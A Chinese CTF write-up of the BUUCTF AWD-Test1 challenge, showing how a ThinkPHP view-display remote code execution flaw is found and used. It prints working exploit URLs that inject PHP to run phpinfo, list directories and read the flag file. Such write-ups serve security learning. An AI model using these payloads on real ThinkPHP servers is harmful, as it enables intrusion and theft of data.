当前位置:   article > 正文

BUUCTF AWD-Test1

BUUCTF AWD-Test1

打开靶场是这个有些简陋的界面。

随便点点,找到这个东西。

看到ThinkPHP,思路瞬间清晰,老熟人了。这个就是ThinkPHP漏洞。根据版本我们去找一下poc

/index.php/?s=Index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1

成功打开phpinfo界面。

查看目录

/index.php/?s=Index/\think\View/display&content="<?><?php%20system(%27ls%20/../%27);?>&data=1

找到flag了,抓取。

/index.php/?s=Index/\think\View/display&content="<?><?php%20system(%27cat%20/../flag%27);?>&data=1

防止有些新朋友不明白POC怎么来的,简短介绍一下。

这poc的意思是在URL中发送了一个参数 s。Index/\think\View/displayThinkPHP框架中,这会被解释为对视图进行显示的操作。content是包含php代码的字符串,其中是执行的恶意代码。

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小丑西瓜9/article/detail/188051
推荐阅读
相关标签
  

闽ICP备14008679号